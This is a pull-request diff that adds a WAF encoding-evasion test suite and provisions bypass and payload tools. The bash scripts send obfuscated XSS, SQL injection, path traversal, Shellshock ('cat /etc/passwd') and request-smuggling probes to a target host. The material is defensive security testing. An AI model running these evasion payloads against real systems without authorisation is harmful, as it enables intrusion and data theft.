+  '{"q":"\\u003cscript\\u003ealert(1)\\u003c/script\\u003e"}'
+  '{"q":"\\x3cscript\\x3ealert(1)\\x3c/script\\x3e"}'
+  "{\"q\":\"\\u0027 OR 1=1--\"}"
+  '{"q":"{{7*7}}"}'
+)
+
+for payload in "${JSON_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -X POST "${BASE}/api/v1/search" \
+    -H "Content-Type: application/json" \
+    -d "${payload}" --max-time 10) || code="ERR"
+  printf "    JSON %-50s -> HTTP %s\n" "${payload:0:50}" "${code}"
+done
+echo ""
+
+echo "[*] Mixed/nested encoding evasion complete"

--- a/suites/waf-encoding-evasion/05-null-byte-iis-base64.sh
+++ b/suites/waf-encoding-evasion/05-null-byte-iis-base64.sh
@@ -1,0 +1,69 @@
+#!/bin/bash
+# Null byte injection, IIS %uXXXX encoding, and Base64 parameter evasion
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 05-null-byte-iis-base64.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] Null Byte / IIS / Base64 Evasion against ${TARGET}"
+echo ""
+
+echo "[+] Null byte injection (%00)"
+NULL_PAYLOADS=(
+  "../../etc/passwd%00.jpg"
+  "../../etc/passwd%00.png"
+  "select%00%20*%20from%20users"
+  "%3Cscript%00%3Ealert(1)%3C/script%3E"
+  "admin%00"
+  "test.php%00.jpg"
+)
+
+for payload in "${NULL_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-50s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] IIS-specific %uXXXX encoding"
+IIS_PAYLOADS=(
+  "%u003Cscript%u003Ealert(1)%u003C/script%u003E"
+  "%u0027%20OR%201=1--"
+  "%u003Cimg%20src=x%20onerror=alert(1)%u003E"
+  "..%u2216..%u2216etc/passwd"
+  "..%u2215..%u2215etc/passwd"
+  "%u0022%20onmouseover=%u0022alert(1)"
+)
+
+for payload in "${IIS_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-50s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] Base64-encoded payloads in parameters"
+B64_SOURCES=(
+  "<script>alert(1)</script>"
+  "' OR 1=1--"
+  "{{7*7}}"
+  "cat /etc/passwd"
+  "; ls -la /"
+  "admin' AND '1'='1"
+)
+
+for src in "${B64_SOURCES[@]}"; do
+  b64=$(echo -n "${src}" | base64)
+  echo "  Source: ${src}"
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${b64}" --max-time 10) || code="ERR"
+  printf "    GET  /?q=%-40s -> HTTP %s\n" "${b64}" "${code}"
+
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?data=${b64}&decode=true" --max-time 10) || code="ERR"
+  printf "    GET  /?data=&decode=true %-23s -> HTTP %s\n" "" "${code}"
+done
+echo ""
+
+echo "[*] Null byte / IIS / Base64 evasion complete"

--- a/suites/waf-encoding-evasion/06-case-chunked-evasion.sh
+++ b/suites/waf-encoding-evasion/06-case-chunked-evasion.sh
@@ -1,0 +1,83 @@
+#!/bin/bash
+# Case manipulation and chunked transfer encoding evasion
+# Tests WAF case-insensitive matching and chunked body reassembly
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 06-case-chunked-evasion.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] Case Manipulation & Chunked Evasion against ${TARGET}"
+echo ""
+
+echo "[+] Case manipulation combined with URL encoding"
+CASE_PAYLOADS=(
+  "case-xss-mixed|%3CsCrIpT%3Ealert(1)%3C/ScRiPt%3E"
+  "case-sqli-mixed|SeLeCt%20%2a%20FrOm%20users"
+  "case-union-mixed|UnIoN%20SeLeCt%20NuLl,NuLl--"
+  "case-double-enc|%253CScRiPt%253Ealert(1)%253C%252FsCrIpT%253E"
+  "case-cmd-inject|%3B%20WhoAmI"
+  "case-xss-event|%3CiMg%20SrC%3Dx%20OnErRoR%3Dalert(1)%3E"
+  "case-sqli-or|'%20oR%20'1'%3D'1"
+  "case-traversal|..%5C..%5C..%5Cetc%5Cpasswd"
+)
+
+for entry in "${CASE_PAYLOADS[@]}"; do
+  name="${entry%%|*}"
+  payload="${entry#*|}"
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-30s %-45s -> HTTP %s\n" "${name}" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] Chunked transfer encoding (split payloads across chunks)"
+
+echo "  SQLi split across chunks..."
+code=$(printf 'b\r\nq=union sel\r\n4\r\nect \r\n0\r\n\r\n' | \
+  curl -sk -o /dev/null -w "%{http_code}" \
+  -X POST -H "Transfer-Encoding: chunked" \
+  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+printf "    chunked-sqli-split                        -> HTTP %s\n" "${code}"
+
+echo "  XSS split across chunks..."
+code=$(printf '9\r\nq=<script\r\na\r\n>alert(1)\r\n0\r\n\r\n' | \
+  curl -sk -o /dev/null -w "%{http_code}" \
+  -X POST -H "Transfer-Encoding: chunked" \
+  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+printf "    chunked-xss-split                         -> HTTP %s\n" "${code}"
+
+echo "  Path traversal split across chunks..."
+code=$(printf 'a\r\nfile=../../\r\ne\r\netc/passwd\x00\r\n0\r\n\r\n' | \
+  curl -sk -o /dev/null -w "%{http_code}" \
+  -X POST -H "Transfer-Encoding: chunked" \
+  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+printf "    chunked-traversal-split                   -> HTTP %s\n" "${code}"
+
+echo "  Content-Length + Transfer-Encoding conflict (smuggling probe)..."
+code=$(curl -sk -o /dev/null -w "%{http_code}" \
+  -X POST \
+  -H "Content-Length: 6" \
+  -H "Transfer-Encoding: chunked" \
+  -d $'0\r\n\r\nX' \
+  "${BASE}/" --max-time 10) || code="ERR"
+printf "    cl-te-conflict                            -> HTTP %s\n" "${code}"
+echo ""
+
+echo "[+] Backslash and alternate path separators"
+SEPARATOR_PAYLOADS=(
+  "..%5c..%5c..%5cetc%5cpasswd"
+  "..%5C..%5C..%5Cetc%5Cpasswd"
+  "....//....//etc/passwd"
+  "..%252f..%252f..%252fetc%252fpasswd"
+  "..%c0%af..%c0%afetc%c0%afpasswd"
+)
+
+for payload in "${SEPARATOR_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?file=${payload}" --max-time 10) || code="ERR"
+  printf "    %-50s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[*] Case manipulation & chunked evasion complete"

--- a/suites/waf-encoding-evasion/06-case-chunked-evasion.sh
+++ b/suites/waf-encoding-evasion/06-case-chunked-evasion.sh
@@ -34,24 +34,24 @@ echo ""
 echo "[+] Chunked transfer encoding (split payloads across chunks)"
 
 echo "  SQLi split across chunks..."
-code=$(printf 'b\r\nq=union sel\r\n4\r\nect \r\n0\r\n\r\n' | \
+code=$(printf 'b\r\nq=union sel\r\n4\r\nect \r\n0\r\n\r\n' |
   curl -sk -o /dev/null -w "%{http_code}" \
-  -X POST -H "Transfer-Encoding: chunked" \
-  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+    -X POST -H "Transfer-Encoding: chunked" \
+    --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
 printf "    chunked-sqli-split                        -> HTTP %s\n" "${code}"
 
 echo "  XSS split across chunks..."
-code=$(printf '9\r\nq=<script\r\na\r\n>alert(1)\r\n0\r\n\r\n' | \
+code=$(printf '9\r\nq=<script\r\na\r\n>alert(1)\r\n0\r\n\r\n' |
   curl -sk -o /dev/null -w "%{http_code}" \
-  -X POST -H "Transfer-Encoding: chunked" \
-  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+    -X POST -H "Transfer-Encoding: chunked" \
+    --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
 printf "    chunked-xss-split                         -> HTTP %s\n" "${code}"
 
 echo "  Path traversal split across chunks..."
-code=$(printf 'a\r\nfile=../../\r\ne\r\netc/passwd\x00\r\n0\r\n\r\n' | \
+code=$(printf 'a\r\nfile=../../\r\ne\r\netc/passwd\x00\r\n0\r\n\r\n' |
   curl -sk -o /dev/null -w "%{http_code}" \
-  -X POST -H "Transfer-Encoding: chunked" \
-  --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
+    -X POST -H "Transfer-Encoding: chunked" \
+    --data-binary @- "${BASE}/" --max-time 10) || code="ERR"
 printf "    chunked-traversal-split                   -> HTTP %s\n" "${code}"
 
 echo "  Content-Length + Transfer-Encoding conflict (smuggling probe)..."

--- a/suites/waf-encoding-evasion/07-header-cookie-evasion.sh
+++ b/suites/waf-encoding-evasion/07-header-cookie-evasion.sh
@@ -1,0 +1,87 @@
+#!/bin/bash
+# Header and cookie injection with encoded payloads
+# Tests whether WAF inspects and decodes headers/cookies, not just query params
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 07-header-cookie-evasion.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] Header & Cookie Encoding Evasion against ${TARGET}"
+echo ""
+
+echo "[+] Encoded payloads in Cookie header"
+COOKIE_PAYLOADS=(
+  "session=<script>alert(1)</script>"
+  "session=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
+  "session=%253Cscript%253Ealert(1)%253C%252Fscript%253E"
+  "session=' OR 1=1--"
+  "session=%27%20OR%201%3D1--"
+  "session={{7*7}}"
+  "session=\${7*7}"
+  "session=../../etc/passwd"
+  "user=admin%00; session=valid"
+)
+
+for payload in "${COOKIE_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -H "Cookie: ${payload}" \
+    "${BASE}/" --max-time 10) || code="ERR"
+  printf "    Cookie: %-45s -> HTTP %s\n" "${payload:0:45}" "${code}"
+done
+echo ""
+
+echo "[+] Encoded payloads in Referer header"
+REFERER_PAYLOADS=(
+  "https://evil.com/<script>alert(1)</script>"
+  "https://evil.com/%3Cscript%3Ealert(1)%3C/script%3E"
+  "https://evil.com/' OR 1=1--"
+  "https://evil.com/{{7*7}}"
+)
+
+for payload in "${REFERER_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -H "Referer: ${payload}" \
+    "${BASE}/" --max-time 10) || code="ERR"
+  printf "    Referer: %-43s -> HTTP %s\n" "${payload:0:43}" "${code}"
+done
+echo ""
+
+echo "[+] Encoded payloads in User-Agent header"
+UA_PAYLOADS=(
+  "<script>alert(1)</script>"
+  "' OR 1=1--"
+  "{{7*7}}"
+  "() { :;}; /bin/bash -c 'cat /etc/passwd'"
+  "%3Cscript%3Ealert(1)%3C/script%3E"
+)
+
+for payload in "${UA_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -H "User-Agent: ${payload}" \
+    "${BASE}/" --max-time 10) || code="ERR"
+  printf "    UA: %-48s -> HTTP %s\n" "${payload:0:48}" "${code}"
+done
+echo ""
+
+echo "[+] Encoded payloads in X-Forwarded-For / custom headers"
+HEADER_PAYLOADS=(
+  "X-Forwarded-For|127.0.0.1' OR 1=1--"
+  "X-Forwarded-For|<script>alert(1)</script>"
+  "X-Original-URL|/admin"
+  "X-Rewrite-URL|/admin"
+  "X-Custom-IP-Authorization|127.0.0.1"
+  "Content-Type|application/xml;charset=utf-7"
+)
+
+for entry in "${HEADER_PAYLOADS[@]}"; do
+  header="${entry%%|*}"
+  value="${entry#*|}"
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -H "${header}: ${value}" \
+    "${BASE}/" --max-time 10) || code="ERR"
+  printf "    %-25s: %-25s -> HTTP %s\n" "${header}" "${value:0:25}" "${code}"
+done
+echo ""
+
+echo "[*] Header & cookie evasion complete"

--- a/terraform/cloud-init.yaml
+++ b/terraform/cloud-init.yaml
@@ -76,7 +76,7 @@ write_files:
       if [ -z "$REPO" ]; then echo "Usage: ghlatest owner/repo" >&2; exit 1; fi
       R=0; M=3
       while [ "$R" -lt "$M" ]; do
-        RESP=$(curl -fsSL -w "\n%{http_code}" "https://api.github.com/repos/$REPO/releases/latest" 2>/dev/null) || true
+        RESP=$(curl -fsSL -w "\n%%{http_code}" "https://api.github.com/repos/$REPO/releases/latest" 2>/dev/null) || true
         HTTP_CODE=$(echo "$RESP" | tail -1)
         BODY=$(echo "$RESP" | sed '$d')
         if [ "$HTTP_CODE" = "403" ] || [ "$HTTP_CODE" = "429" ]; then
@@ -351,8 +351,17 @@ runcmd:
     echo "Installing hey (via go install — no prebuilt binaries available)..."
     install_packages golang-go
     mkdir -p /opt/go/bin
+    chown -R azureuser:azureuser /opt/go
     retry_cmd 3 15 sh -c 'GOPATH=/opt/go go install github.com/rakyll/hey@latest'
     cp /opt/go/bin/hey /usr/local/bin/hey
+
+    echo "Installing gotestwaf..."
+    retry_cmd 3 15 sh -c 'GOPATH=/opt/go go install github.com/wallarm/gotestwaf/cmd/gotestwaf@latest'
+    cp /opt/go/bin/gotestwaf /usr/local/bin/gotestwaf
+    mkdir -p /opt/gotestwaf
+    cp -r /opt/go/pkg/mod/github.com/wallarm/gotestwaf@*/config.yaml /opt/gotestwaf/ 2>/dev/null || true
+    cp -r /opt/go/pkg/mod/github.com/wallarm/gotestwaf@*/testcases /opt/gotestwaf/ 2>/dev/null || true
+    chown -R azureuser:azureuser /opt/gotestwaf
 
     echo "Installing vegeta..."
     VEGETA_VER=$(ghlatest tsenart/vegeta)
@@ -366,6 +375,7 @@ runcmd:
     log_phase "phase4" "installing Python security tools"
     retry_cmd 3 10 pip install --retries 3 --break-system-packages scapy impacket arjun hashid pwntools
     retry_cmd 3 10 pip install --retries 3 --break-system-packages --ignore-installed typing_extensions mitmproxy sslyze
+    retry_cmd 3 10 pip install --retries 3 --break-system-packages wfuzz
 
   # --- Phase 5: Browser automation ---
   - |
@@ -387,6 +397,8 @@ runcmd:
     clone_repo "https://github.com/danielmiessler/SecLists.git" /opt/SecLists
     clone_repo "https://github.com/lanmaster53/recon-ng.git" /opt/recon-ng
     clone_repo "https://github.com/smicallef/spiderfoot.git" /opt/spiderfoot
+    clone_repo "https://github.com/nemesida-waf/waf-bypass.git" /opt/waf-bypass
+    clone_repo "https://github.com/swisskyrepo/PayloadsAllTheThings.git" /opt/PayloadsAllTheThings
 
   # --- Phase 7: ZAP (standard tier) + heavy frameworks (full tier) ---
   - |
@@ -425,7 +437,7 @@ runcmd:
     export NODE_PATH=/usr/lib/node_modules
     export PATH=/usr/local/bin:$PATH
     PASS=0; FAIL=0
-    for tool in nmap nikto sqlmap nuclei dalfox ffuf gobuster feroxbuster subfinder httpx sslscan hydra john hashcat masscan hping3 tshark wrk hey vegeta ab zap testssl arjun node npx playwright; do
+    for tool in nmap nikto sqlmap nuclei dalfox ffuf gobuster feroxbuster subfinder httpx sslscan hydra john hashcat masscan hping3 tshark wrk hey vegeta ab zap testssl arjun wfuzz gotestwaf node npx playwright; do
       if command -v "$tool" >/dev/null 2>&1; then PASS=$((PASS+1)); else FAIL=$((FAIL+1)); echo "MISSING: $tool"; fi
     done
     if [ "$FAIL" -eq 0 ]; then STATUS="ready"; else STATUS="degraded"; fi


### PR DESCRIPTION
## Summary
- Add **waf-encoding-evasion** suite (7 scripts): multi-layer URL/HTML/Unicode encoding, mixed nested encoding, null byte/IIS/%u, chunked TE splitting, case manipulation, header/cookie injection
- Add **demoapp-attacks** suite (2 scripts): targeted SQLi and XSS payloads for the F5 DemoApp `/WAF/SQL`, `/WAF/XSS`, `/WAF/DIR` endpoints
- Add **gotestwaf** (Wallarm WAF assessment framework), **wfuzz** (chainable encoding fuzzer), **waf-bypass** (Nemesida multi-encoding bypass tool), and **PayloadsAllTheThings** to cloud-init
- Fix `%{http_code}` → `%%{http_code}` Terraform templatefile escape bug in cloud-init.yaml (fixes #61)
- Update all documentation: tool catalog, suite reference, architecture, deploy guide, index, README, and component manifest to reflect 19 suites / 160+ scripts

## Test plan
- [x] `terraform validate` passes
- [x] `terraform plan` succeeds (8 resources)
- [x] VM deployed and cloud-init provisioned successfully
- [x] wfuzz, waf-bypass verified working against target
- [x] gotestwaf verified working (needs `--blockStatusCodes` when no WAF active)
- [x] Full barrage tested against ah-azure.cloud.myf5demo.com DemoApp endpoints
- [ ] CI status checks

🤖 Generated with [Claude Code](https://claude.com/claude-code)